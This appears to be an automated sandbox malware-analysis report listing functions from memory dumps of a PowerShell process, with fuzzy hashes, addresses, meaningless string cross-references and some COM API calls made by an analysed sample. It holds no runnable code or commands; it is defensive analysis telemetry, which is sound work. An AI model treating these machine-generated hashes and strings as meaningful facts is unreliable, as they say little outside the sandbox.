Instruction ID: b81943782575dddee3aa8b4c367e70333b453b2f0444944ffb39ab243575eb48
Opcode Fuzzy Hash: 72a610ef5c80a53869eb2c03bb9f393709f7f18be8c8c9a2a0e15fcd3219ea10
Instruction Fuzzy Hash: AA51B971E10A188BEB18CF6BDD4469ABBF3BFC8301F14C1A9D409AB295DB745A81CF50

Function 06C00040 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70dd716a4779f460e154537b72e66cd6f96626f81ea44e52f532c4aa27289a54
Instruction ID: 30c651f8d36e9156efa04107574e7ad25755a990b2885656d13a714a0145f147
Opcode Fuzzy Hash: 70dd716a4779f460e154537b72e66cd6f96626f81ea44e52f532c4aa27289a54
Instruction Fuzzy Hash: FA519670D05658CFEB68DF6AC95879ABBF2BF88305F14C1E9C409A72A4DB744A85CF40

Function 06BE69C9 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454308070.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6be0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7d5837a35dead27b3daaeac141cdbcb6d17a226fc3d2127876032004b8461643
Instruction ID: 5e87de814eeaa2c4fbb51d3e4def7920e45409edb43ddf2db4f422b8b22f479c
Opcode Fuzzy Hash: 7d5837a35dead27b3daaeac141cdbcb6d17a226fc3d2127876032004b8461643
Instruction Fuzzy Hash: 034159B4D16208CFEB54DFE9D644BADBBF2FBAA301F10916AE409A7261E7345941CF40

Function 06C48018 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454830630.0000000006C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c40000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 139762c32a3948b6bc924f15f39e990552772161190f806657ef6f144a391d65
Instruction ID: dc0b850878adf9fc8c94ec07a54190ffd65bdd3486d5139378f431e381287a90
Opcode Fuzzy Hash: 139762c32a3948b6bc924f15f39e990552772161190f806657ef6f144a391d65
Instruction Fuzzy Hash: CD416E71D016199FEB58DF6BC84069AFBF3AFC9300F14C1BAD419AA254EB3549468F50

Function 008E28A8 Relevance: .1, Instructions: 115COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2422970271.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f120690759c773fe27c42e21d04597c21a51b444d046d8a64a30451ba11fc2f
Instruction ID: d7311383c5c25f9eeaf29f788d2532b02d3b7f2084210f60880bb9e8d957b61e
Opcode Fuzzy Hash: 5f120690759c773fe27c42e21d04597c21a51b444d046d8a64a30451ba11fc2f
Instruction Fuzzy Hash: 91513171D056688BEB2CCF2B8D456CAFAF7BFC9300F14C1FA954CA6254DB700A828E41

Function 008E2898 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2422970271.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8e0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8957e68dbec0fc23c2ae5a3de4ea54406a244be54048bd5d3b1d2601155e4fdf
Instruction ID: 46bd6ed8896df0b7c45cd245efcb14c8f768bb7061f6e9ca67cd36284d6c7aa1
Opcode Fuzzy Hash: 8957e68dbec0fc23c2ae5a3de4ea54406a244be54048bd5d3b1d2601155e4fdf
Instruction Fuzzy Hash: 9B511471D056588BEB2DCF6B8D452CAFAF3AFC9300F04C1F9955CA6264DB740A868F51

Function 06C00007 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454519270.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08ba1d4c10f02e77ffac7fbd2ffb0ea06c3a9c1a6b856654a28e7f99806c19c1
Instruction ID: 257a12f15f0f06f40f44d36a421aaa195ae55a8173f71ecb134f186386bb6e41
Opcode Fuzzy Hash: 08ba1d4c10f02e77ffac7fbd2ffb0ea06c3a9c1a6b856654a28e7f99806c19c1
Instruction Fuzzy Hash: 3C41D870D056588FEB59CF6B894478AFFF3AF89314F18C1EAC448AA265DB740986CF11

Function 06C18D50 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb431dad73c1f1ae5dc188f1082bae4422ff2cf5ad9f8a39d675078508141c23
Instruction ID: 94876a9eae0e59269de0c5beaec2edf10fb98f3acd993c6e5dda063d40aa7aad
Opcode Fuzzy Hash: cb431dad73c1f1ae5dc188f1082bae4422ff2cf5ad9f8a39d675078508141c23
Instruction Fuzzy Hash: BF21FBB0E056188FEB58CF9AC9443DEFBF7AF89300F14C0A9D409AA254DB740A85DF41

Function 06C18D45 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454603326.0000000006C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c10000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d83debbb7a980f11950c249082b363d5f2390290d7e8d3e1c9af179fa8587019
Instruction ID: 81ae79f456c643b6a3c6d804215997229569fe28ceabf26117e398c2791d9756
Opcode Fuzzy Hash: d83debbb7a980f11950c249082b363d5f2390290d7e8d3e1c9af179fa8587019
Instruction Fuzzy Hash: 72213E70E066189BEB58CF5BD9403DEFBF7AFC9300F04C06AD408AA254DB34094A8F50

Function 06BE95E5 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454308070.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6be0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 99f925da7807842d31aa18c2605085b79c88f4ad407e561857e07fbd84465a91
Instruction ID: 9d5f3c56c27fcb4df03df6f666ca738b5daac43ee2db15f86fdb6c0b60197ea7
Opcode Fuzzy Hash: 99f925da7807842d31aa18c2605085b79c88f4ad407e561857e07fbd84465a91
Instruction Fuzzy Hash: 8801A970A0D726DFE399DF78D8E18EA7360FF412293A540BFC80289805E775981BCE80

Function 06BE9635 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454308070.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6be0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e6c0cb56b5b0e453cf2a0b14f27be5ba7ac281e8711d75e13f0dffe5f1b4d39
Instruction ID: fb5b8b6ea1aef9001a70814b2b03de81a64b19d98635c6405ea944b0829c6260
Opcode Fuzzy Hash: 3e6c0cb56b5b0e453cf2a0b14f27be5ba7ac281e8711d75e13f0dffe5f1b4d39
Instruction Fuzzy Hash: 17D0127451A32A9FE3569F7594834EAB3B0FD01668712A07FC10189411EB7494179EC0

Function 06BE962D Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454308070.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6be0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb2476b0c9a4af92bca5f3696d75896ffd46d68361dbff8066a4d76c3915ba2f
Instruction ID: 461e12c50f10c3c6c2b572f17bc8e65da02ee88f63fd03da767063d85e857f1a
Opcode Fuzzy Hash: fb2476b0c9a4af92bca5f3696d75896ffd46d68361dbff8066a4d76c3915ba2f
Instruction Fuzzy Hash: A2C08CB092B3268F93D06E1A95570FAF3A0A882565A12F43FC20184800A734949A5EC0

Function 06BE9645 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.2454308070.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6be0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b2106ea2f1bec4d33f7c85eb73031605f06b5b811ae4f317341248c65f3f1dad
Instruction ID: d198a1f95db3e6405221e7abbe0f4798be6f3be71bcea96776107a09f8919cfa
Opcode Fuzzy Hash: b2106ea2f1bec4d33f7c85eb73031605f06b5b811ae4f317341248c65f3f1dad
Instruction Fuzzy Hash: ECC08C30A0A326AFD7848E2382A32EFF3F0AE10624322923FE402004409B39242B7E00

Function 072C0708 Relevance: 10.5, Strings: 8, Instructions: 498COMMON

Download Yara Rule

Strings

$^q, xrefs: 072C099B
$^q, xrefs: 072C097A
4'^q, xrefs: 072C089F
., xrefs: 072C0964
4'^q, xrefs: 072C0B44
4'^q, xrefs: 072C0B4E
4'^q, xrefs: 072C0895
$^q, xrefs: 072C09A9

Memory Dump Source

Source File: 00000004.00000002.2458981961.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_72c0000_powershell.jbxd

Similarity

API ID:
String ID: .$4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-1341042235
Opcode ID: 1c4dd2acb8224b6d84ea7a4d8542ca60c02601e95a5f167cca58396431476321
Instruction ID: 619908eac6284802a6dcd69c8686e31363fc4441c445562f3c1c0c0d859fec22
Opcode Fuzzy Hash: 1c4dd2acb8224b6d84ea7a4d8542ca60c02601e95a5f167cca58396431476321
Instruction Fuzzy Hash: 1CF167B1724347CFDB24CA298C0077ABBA2AFE5610F1886BED505CF355DA32D945C7A2

Function 07199650 Relevance: 10.2, Strings: 8, Instructions: 179COMMON

Download Yara Rule

Strings

$^q, xrefs: 0719970C
4'^q, xrefs: 071997CA
$^q, xrefs: 0719978C
$^q, xrefs: 0719977C
4'^q, xrefs: 071997BE
$^q, xrefs: 071996F0
$^q, xrefs: 0719972E
$^q, xrefs: 0719973C

Memory Dump Source

Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3732357466
Opcode ID: 72572381a2c29de48303f7f262761e6b8fceea70b77976c7cfa4e89f8edac8d1
Instruction ID: 1318ab26404747dcf565861f431b9991b7341781f1dbe8178697c09b46bb6d61
Opcode Fuzzy Hash: 72572381a2c29de48303f7f262761e6b8fceea70b77976c7cfa4e89f8edac8d1
Instruction Fuzzy Hash: 6951F5B5B0020ADFDF2D8E29D8446AAB7E6ABC5250F14847ED4058F295DF31E847CB92

Function 07196390 Relevance: 8.9, Strings: 7, Instructions: 171COMMON

Download Yara Rule

Strings

4'^q, xrefs: 07196630
$^q, xrefs: 07196600
tP^q, xrefs: 07196542
$^q, xrefs: 07196445
$^q, xrefs: 07196466
$^q, xrefs: 07196482
$^q, xrefs: 071964A4

Memory Dump Source

Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$tP^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-1644488550
Opcode ID: 2e58f62eb3d2c8e8589fcc35377b136224bc6344a46f2c2ac41e2f94e6745834
Instruction ID: 6c135ab55afc3f2ea26b9fd1573ebad659e9cc68114bfdbfb825a1ac05f230a8
Opcode Fuzzy Hash: 2e58f62eb3d2c8e8589fcc35377b136224bc6344a46f2c2ac41e2f94e6745834
Instruction Fuzzy Hash: 8551A1B0A00206DFDF2ACE55C644B6AB7F2AB85750F5A8076D8059F2D5C731DC46CBB1

Function 06BDA6C8 Relevance: 7.9, Strings: 6, Instructions: 405COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06BDA79A
(bq, xrefs: 06BDA892
4'^q, xrefs: 06BDA77C
4'^q, xrefs: 06BDA812
pbq, xrefs: 06BDA81F
4'^q, xrefs: 06BDA74C

Memory Dump Source

Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd

Similarity

API ID:
String ID: (bq$4'^q$4'^q$4'^q$4'^q$pbq
API String ID: 0-723292480
Opcode ID: 11fa0d95df9340f1b5c5ec78c5f3b91ce43ca74f26b8e1589a6df7e2f6feeb8e
Instruction ID: ba3a6111942539f6f769bd8f15f623422df26d71de583d5d66022c71f051d224
Opcode Fuzzy Hash: 11fa0d95df9340f1b5c5ec78c5f3b91ce43ca74f26b8e1589a6df7e2f6feeb8e
Instruction Fuzzy Hash: 3FD14D76900118DFCB45DFA4C944D99BBB2FF88310F0584E8E609AB276DB32ED56DB90

Function 072C0285 Relevance: 7.6, Strings: 6, Instructions: 74COMMON

Download Yara Rule

Strings

$^q, xrefs: 072C0352
4'^q, xrefs: 072C037F
4'^q, xrefs: 072C0373
4'^q, xrefs: 072C02EB
4'^q, xrefs: 072C02F7
$^q, xrefs: 072C035E

Memory Dump Source

Source File: 00000004.00000002.2458981961.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_72c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q
API String ID: 0-1041444323
Opcode ID: 0024e13749b5f322a76730e7e99128e14370bbea97c255937ea8a36bcecd37a8
Instruction ID: 70e8f2af948814bcd0de66171aec92c7c8aab0667b299b42c3d22686e79767d7
Opcode Fuzzy Hash: 0024e13749b5f322a76730e7e99128e14370bbea97c255937ea8a36bcecd37a8
Instruction Fuzzy Hash: 10115CB1B69347CFCB3D95782C2412A6AE76FE1950729466FC040CF35ADF628C4A8383

Function 072C5635 Relevance: 6.7, Strings: 5, Instructions: 488COMMON

Download Yara Rule

Strings

Pq^q, xrefs: 072C566F
4'^q, xrefs: 072C5A76
4'^q, xrefs: 072C59F1
4'^q, xrefs: 072C59FD
4'^q, xrefs: 072C5A82

Memory Dump Source

Source File: 00000004.00000002.2458981961.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_72c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$Pq^q
API String ID: 0-653376292
Opcode ID: 319fa4bb2f965dfa8258abb137f73433e153b34bf6f11baf2bc442ed67e23a4e
Instruction ID: 4b887adcb27ce72b5c6187bd4fb7a3b7c47b872a5b7fb7e4184b0008c594c19a
Opcode Fuzzy Hash: 319fa4bb2f965dfa8258abb137f73433e153b34bf6f11baf2bc442ed67e23a4e
Instruction Fuzzy Hash: 38227174B102158FCB24DB19C950B9ABBB2EF98300F54C5E9D409AF355DB71ED868F81

Function 072C0D08 Relevance: 6.6, Strings: 5, Instructions: 319COMMON

Download Yara Rule

Strings

4'^q, xrefs: 072C0EDD
$^q, xrefs: 072C0D1A
$^q, xrefs: 072C0D3B
$^q, xrefs: 072C0D49
4'^q, xrefs: 072C0ED1

Memory Dump Source

Source File: 00000004.00000002.2458981961.00000000072C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 072C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_72c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: f2a75461623fa7789ca5b8bcb3494a73a11ddc83aff7ce8281e24ab03c461001
Instruction ID: 06802e82c3e55635e4af2337456da3569bdf0e389fa249e7b8ee9ed362a5edce
Opcode Fuzzy Hash: f2a75461623fa7789ca5b8bcb3494a73a11ddc83aff7ce8281e24ab03c461001
Instruction Fuzzy Hash: 8BA149B1B2435ACFDB20CA699C0066ABBA5EFA5210F18857FD905CB345DF32D845C7A2

Function 0719E608 Relevance: 6.5, Strings: 5, Instructions: 283COMMON

Download Yara Rule

Strings

$^q, xrefs: 0719E697
$^q, xrefs: 0719E6A3
$^q, xrefs: 0719E67B
4'^q, xrefs: 0719E6BF
4'^q, xrefs: 0719E6CB

Memory Dump Source

Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3272787073
Opcode ID: cb0e3a15c105b1c474b8e48e122a29c4539c3a3dad2fe81d53d7e59b737bf66e
Instruction ID: e62f2e7817d7b7c951be92ee5fa2f06b558424612c25a07d01dab749679f4f8e
Opcode Fuzzy Hash: cb0e3a15c105b1c474b8e48e122a29c4539c3a3dad2fe81d53d7e59b737bf66e
Instruction Fuzzy Hash: 6E9117B2B04306CFDF29DB69D80066ABBE6AF85610F14847BD545CB291DB31D84BCB92

Function 071970C1 Relevance: 6.4, Strings: 5, Instructions: 150COMMON

Download Yara Rule

Strings

4'^q, xrefs: 071972A2
$^q, xrefs: 071971C8
$^q, xrefs: 07197254
$^q, xrefs: 071971EF
$^q, xrefs: 07197186

Memory Dump Source

Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$$^q$$^q$$^q$$^q
API String ID: 0-2825857601
Opcode ID: c8393fc33dd48fa71e4f0c20d801478b5fbdb96377e4413d3c6dc0c2e5e52d47
Instruction ID: ca2cea38624c41786a12d2afbfb86c549cd92b18cf1307382adada9fc0fd8cbd
Opcode Fuzzy Hash: c8393fc33dd48fa71e4f0c20d801478b5fbdb96377e4413d3c6dc0c2e5e52d47
Instruction Fuzzy Hash: AC51BCB0A3020ADFDF2ACE19D9447AA77B1FF42311F198576E8048B2D0D735D986CBA5

Function 07199634 Relevance: 6.4, Strings: 5, Instructions: 118COMMON

Download Yara Rule

Strings

$^q, xrefs: 0719970C
$^q, xrefs: 0719977C
4'^q, xrefs: 071997BE
$^q, xrefs: 071996F0
$^q, xrefs: 0719972E

Memory Dump Source

Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$$^q$$^q$$^q$$^q
API String ID: 0-2825857601
Opcode ID: a041fd9387b4c41731afe017563f45bf07a32fd135f5bf8f870ef50f19c006f4
Instruction ID: d3109267de8c324c72b19a88d40ed2ed06c1265197fe501e3fc604629731685a
Opcode Fuzzy Hash: a041fd9387b4c41731afe017563f45bf07a32fd135f5bf8f870ef50f19c006f4
Instruction Fuzzy Hash: 3141B6F5A0420ADFDF2E8E25C4446A97BE5ABC2650F15807ED4048F1D2DB35F987CB92

Function 0719CEE0 Relevance: 6.4, Strings: 5, Instructions: 112COMMON

Download Yara Rule

Strings

4'^q, xrefs: 0719CF97
4'^q, xrefs: 0719D0D1
tP^q, xrefs: 0719CFE9
TQcq, xrefs: 0719D0A1
TQcq, xrefs: 0719CF3D

Memory Dump Source

Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$TQcq$TQcq$tP^q
API String ID: 0-3549194529
Opcode ID: 5375cb907e4866ba9df60e0fdb896d6e32d51aa578f92c1fbdcabf706167c7b4
Instruction ID: 47d283bab77de639b4ac68511fdb05cec793f40ac43b6048436a6a15e338e4a5
Opcode Fuzzy Hash: 5375cb907e4866ba9df60e0fdb896d6e32d51aa578f92c1fbdcabf706167c7b4
Instruction Fuzzy Hash: 6C41E7B1B00206DFDF298E24D40476AB7B2BF85711F1984BAE8415F2D0D772D887CBA1

Function 06BD9B58 Relevance: 5.3, Strings: 4, Instructions: 325COMMON

Download Yara Rule

Strings

(bq, xrefs: 06BD9BB6
Hbq, xrefs: 06BD9EA3
(bq, xrefs: 06BD9B8A
Hbq, xrefs: 06BD9F0B

Memory Dump Source

Source File: 00000004.00000002.2454217387.0000000006BD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6bd0000_powershell.jbxd

Similarity

API ID:
String ID: (bq$(bq$Hbq$Hbq
API String ID: 0-2599935029
Opcode ID: 47b1fc00e07fefa7762cf4dbe1fda045aa36f5101d4987afe056e199e3afc7d7
Instruction ID: f241b5e8e45e07b99160084dbff1b530c012c2234fe466b5a5af1fddc4d75a27
Opcode Fuzzy Hash: 47b1fc00e07fefa7762cf4dbe1fda045aa36f5101d4987afe056e199e3afc7d7
Instruction Fuzzy Hash: 5BC1AA307045599FCB44EF69C880A6E7BA2FF88310F1585A9E909CF3A5DB34ED46CB91

Function 07197DE0 Relevance: 5.3, Strings: 4, Instructions: 302COMMON

Download Yara Rule

Strings

tP^q, xrefs: 07197E83
4'^q, xrefs: 07198192
4'^q, xrefs: 07198186
tP^q, xrefs: 07197E77

Memory Dump Source

Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$tP^q$tP^q
API String ID: 0-3859475322
Opcode ID: fe85862dda00e8038f10d5a10b038af42b7f9e05de976e5a86de456f519986b0
Instruction ID: 6246317093bcc20f4feb38322727d4a2c8beb2986c3c3a16a6b28fc422df9e73
Opcode Fuzzy Hash: fe85862dda00e8038f10d5a10b038af42b7f9e05de976e5a86de456f519986b0
Instruction Fuzzy Hash: 24A138B1B10216CFCF268B69D80067ABBE6AF86710F18847AD445DB2D1DB31DD47C7A2

Function 0719C100 Relevance: 5.3, Strings: 4, Instructions: 287COMMON

Download Yara Rule

Strings

], xrefs: 0719C3D8
`Q^q, xrefs: 0719C35B
`Q^q, xrefs: 0719C343
`Q^q, xrefs: 0719C367

Memory Dump Source

Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_powershell.jbxd

Similarity

API ID:
String ID: ]$`Q^q$`Q^q$`Q^q
API String ID: 0-3436734849
Opcode ID: e8b0f87bf0211355772c0f64843b09d9f89c72874ce4c7a93fe102a33ad6f6d5
Instruction ID: 1bf85d3f486f5b12012babbcca0dc3412762db5dff3942ec577f08d54e2b09d9
Opcode Fuzzy Hash: e8b0f87bf0211355772c0f64843b09d9f89c72874ce4c7a93fe102a33ad6f6d5
Instruction Fuzzy Hash: 59A136B1B002158FCF158F7889006AABBE6AFD6310F1484BAD485DB395DB31DE46C7E2

Function 06BE0A60 Relevance: 5.2, Strings: 4, Instructions: 192COMMON

Download Yara Rule

Strings

(_^q, xrefs: 06BE1154
(_^q, xrefs: 06BE111D
(_^q, xrefs: 06BE118A
(_^q, xrefs: 06BE1113

Memory Dump Source

Source File: 00000004.00000002.2454308070.0000000006BE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6be0000_powershell.jbxd

Similarity

API ID:
String ID: (_^q$(_^q$(_^q$(_^q
API String ID: 0-2697572114
Opcode ID: 52522424847388ca6abbfde01a28efb9d5642c7a0355a968605ac2f46cfc6875
Instruction ID: 99e9f364d1783601169f243774438816a4bbe32069b7cd530b7509dea7c45f8e
Opcode Fuzzy Hash: 52522424847388ca6abbfde01a28efb9d5642c7a0355a968605ac2f46cfc6875
Instruction Fuzzy Hash: 7771C374B042558FC7049F78C8548AA7FB2FF86300B2445AAD406EB3A2DB35DC46CB91

Function 0719E1AC Relevance: 5.2, Strings: 4, Instructions: 150COMMON

Download Yara Rule

Strings

XRcq, xrefs: 0719E2DD
XRcq, xrefs: 0719E2ED
(ztq, xrefs: 0719E32C
XRcq, xrefs: 0719E1E8

Memory Dump Source

Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_powershell.jbxd

Similarity

API ID:
String ID: (ztq$XRcq$XRcq$XRcq
API String ID: 0-2300712528
Opcode ID: a35d1b7e67fd40c6d772de28a2fc5dba5866568c0e908e015e8fbdd1d6e3f54e
Instruction ID: 206057f55d5a5047f8cb01e463549a346f4dde5cdb04714dba146e10ed94d677
Opcode Fuzzy Hash: a35d1b7e67fd40c6d772de28a2fc5dba5866568c0e908e015e8fbdd1d6e3f54e
Instruction Fuzzy Hash: BE510B72710245DFCF15DA68C4106BEBBA2AFC6611F54C47AD8028F2D4DB36DA8BC762

Function 07196648 Relevance: 5.1, Strings: 4, Instructions: 118COMMON

Download Yara Rule

Strings

(o^q, xrefs: 0719668B
tP^q, xrefs: 071967CF
(o^q, xrefs: 07196697
$^q, xrefs: 0719674C

Memory Dump Source

Source File: 00000004.00000002.2458485192.0000000007190000.00000040.00000800.00020000.00000000.sdmp, Offset: 07190000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7190000_powershell.jbxd

Similarity

API ID:
String ID: (o^q$(o^q$tP^q$$^q
API String ID: 0-1137240099
Opcode ID: 7e2202f363adb22e762dfd8edba152d8bc898b8ea32f16bc5266486d9c65b7f5
Instruction ID: 158242c266c3d3682c03f4be294b99e737d8853d45e117ce9da4b3c53b1113b8
Opcode Fuzzy Hash: 7e2202f363adb22e762dfd8edba152d8bc898b8ea32f16bc5266486d9c65b7f5
Instruction Fuzzy Hash: CB4126B1E003059FCF298F698944A6ABFE1EF85710F1584BAD4149F292CB71DC4AC7B1

Function 008E01F5 Relevance: 5.0, Strings: 4, Instructions: 5COMMON

Download Yara Rule

Strings

$^q, xrefs: 008E037F
$^q, xrefs: 008E0369
TJcq, xrefs: 008E033D
jjjjjj, xrefs: 008E02C7

Memory Dump Source

Source File: 00000004.00000002.2422970271.00000000008E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_8e0000_powershell.jbxd

Similarity

API ID:
String ID: TJcq$jjjjjj$$^q$$^q
API String ID: 0-672324049
Opcode ID: e6381625d170a185e19d4d8b639cac2b5161f20f756b985832773fc5cb2fa71e
Instruction ID: 7a5cc659de9449b49f08b2a7a3ef2e343c5b759cbb80d43f625962d1c4143bb9
Opcode Fuzzy Hash: e6381625d170a185e19d4d8b639cac2b5161f20f756b985832773fc5cb2fa71e
Instruction Fuzzy Hash: 70B0125240D3C44EC7530A5554C01403F30AA3300030E41C6C4800F447D0004A46C722

Analysis Process: powershell.exePID: 1196, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	8.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	34.8%
Total number of Nodes:	290
Total number of Limit Nodes:	21

Executed Functions

Function 00436BF0 Relevance: 23.5, APIs: 12, Strings: 1, Instructions: 718
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(0044168C,00000000,00000001,0044167C,00000000), ref: 00436E11
SysAllocString.OLEAUT32(F5A3FBA8), ref: 00436EDA
CoSetProxyBlanket.COMBASE(D77F9D52,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00436F18
SysAllocString.OLEAUT32(68DA6AD6), ref: 00436F6D
SysAllocString.OLEAUT32(BD01C371), ref: 00437025
VariantInit.OLEAUT32(F8FBFAF5), ref: 00437097
SysFreeString.OLEAUT32(?), ref: 00437372
SysFreeString.OLEAUT32(?), ref: 00437382
SysFreeString.OLEAUT32(?), ref: 00437388
